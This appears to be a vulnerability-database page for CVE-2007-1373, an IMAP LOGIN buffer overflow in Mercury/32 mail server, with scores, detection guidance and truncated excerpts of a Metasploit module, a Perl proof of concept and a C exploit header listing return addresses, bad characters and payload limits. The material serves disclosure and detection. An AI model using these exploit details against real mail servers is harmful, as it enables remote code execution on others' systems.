CVE-2007-1373
published 2007-03-10CVE-2007-1373: Stack-based buffer overflow in Mercury/32 (aka Mercury Mail Transport System) 4.01b and earlier allows remote attackers to execute arbitrary code via a long…
PriorityP262critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
58.69%
99.0th percentile
Stack-based buffer overflow in Mercury/32 (aka Mercury Mail Transport System) 4.01b and earlier allows remote attackers to execute arbitrary code via a long LOGIN command. NOTE: this might be the same issue as CVE-2006-5961.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pmail | mercury_mail_transport_system | <= 4.01b | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xCC\x59\xFB\x77
bytes↗
\xED\x1E\x94\x7C
bytes↗
\x23\xde\xaf\x01
bytes↗
\xAB\x8B\xFB\x77
bytes↗
\x6A\xFA\xE8\x77
- →Detect oversized IMAP LOGIN commands (~1008+ spaces followed by a literal size specifier) targeting Mercury/32 IMAP on port 143; the exploit sends 'A001 LOGIN' padded with 1008 spaces then a literal continuation block. ↗
- →Banner-match Mercury/32 IMAP banner for versions 4.01a or 4.01b to identify vulnerable hosts. ↗
- →The exploit uses a two-stage IMAP literal send: first a LOGIN command with a literal size specifier, then a follow-up payload block; detect multi-packet IMAP LOGIN sequences with abnormally large literal sizes on port 143. ↗
- →Total exploit buffer size is approximately 625 bytes for the C PoC exploit; monitor for IMAP LOGIN payloads of this exact size. ↗
- →Bad characters for payload encoding are 0x00, 0x0a, 0x0d, and 0x20 (space/newline); shellcode in exploit traffic will avoid these bytes. ↗
- →Post-exploitation shell-back connection expected on port 4444 from the victim host; monitor outbound TCP connections from Mercury/32 process to port 4444. ↗
- ·The Metasploit module sets EXITFUNC to 'thread', meaning the exploit spawns a thread for shellcode execution and may not crash the main Mercury/32 process, making crash-based detection unreliable. ↗
- ·Payload space is limited to 800 bytes with a stack adjustment of -3500; payloads larger than 800 bytes will not work with this exploit module. ↗
- ·The C exploit targets only Windows 2000 SP4, Windows XP SP1/SP2, and Windows 2003 SP0/SP1 with hardcoded return addresses; other OS versions require different RET addresses and are not covered. ↗
- ·The vulnerability may be the same as CVE-2006-5961; detections and patches should account for both CVE identifiers. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Mercury/32 Mail Server < 4.01b - LOGIN Buffer Overflow (Metasploit)
exploitdb·2010-06-22
CVE-2007-1373 Mercury/32 Mail Server < 4.01b - LOGIN Buffer Overflow (Metasploit)
Mercury/32 Mail Server 'Mercury/32 %q{
This module exploits a stack buffer overflow in Mercury/32 [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9583 $',
'References' =>
[
[ 'CVE', '2007-1373' ],
[ 'OSVDB', '33883' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x20",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ],
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
],
'DisclosureDate' => 'Mar 6 2007',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(143)
], self.class)
end
def check
connect
resp = sock.get_once
disconnect
if (resp =~ /Mercury\/32 v4\.01[a-b]/)
return Exploit::CheckCode::Vuln
Exploit-DB
Mercury/32 Mail Server 4.01b - 'check' Buffer Overflow (PoC)
exploitdb·2007-03-06
CVE-2007-1373 Mercury/32 Mail Server 4.01b - 'check' Buffer Overflow (PoC)
Mercury/32 Mail Server 4.01b - 'check' Buffer Overflow (PoC)
---
#!/usr/bin/perl
#
# mercurypown-v1.pl
#
# Mercury/32 * Connected\n");
$buf = "1 LOGIN".(" "x($LEN-$BUFLEN))."\{255\}\n";
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Sending payload\n");
$buf = $NOP x 255;
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Sending payload 2\n");
$buf = $NOP x $BUFLEN;
send(SOCKET, $buf, 0);
sleep($send_delay);
print("-> * Successfully sent payload!\n");
}
sub print_header {
print("Mercury/32 \n\n");
}
sub usage {
print(qq(Usage: $0 -t
-t : hostname to test
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\
Exploit-DB
Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow
exploitdb·2005-09-20
CVE-2007-1373 Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow
Mercury/32 Mail Server 4.01a (Pegasus) - IMAP Buffer Overflow
---
/*
Mercury imap4 server remote buffer overflow exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
package : Mercury mail transport system 4.01a and prolly prior
workaround : upgrade to 4.01b version
advisory : not available right now
company address : www.pmail.com
timeline :
15 Sep 2005 : vulnerability reported by securiteam mailing list
20 Sep 2005 : IHS exploit released
exploit features :
1) 5 working targets including win2k , winxp , win2k3
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars are : 0x20 0x0a
compiled with visual c++ 6 : cl mercury_imap.c
greeting to :
www.ihsteam.com the team , LorD and NT heya
www.ihsteam.net english version ,
www.exploitdev.com Jamie and Ben the two
Metasploit
Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow
metasploit
Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow
Mercury/32 4.01 IMAP LOGIN SEH Buffer Overflow
This module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD LOGIN verb. By sending a specially crafted login command, a buffer is corrupted, and code execution is possible. This vulnerability was discovered by (mu-b at digit-labs.org).
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/052802.htmlhttp://osvdb.org/33883http://secunia.com/advisories/24367http://securityreason.com/securityalert/2398https://exchange.xforce.ibmcloud.com/vulnerabilities/32848http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/052802.htmlhttp://osvdb.org/33883http://secunia.com/advisories/24367http://securityreason.com/securityalert/2398https://exchange.xforce.ibmcloud.com/vulnerabilities/32848
2007-03-10
Published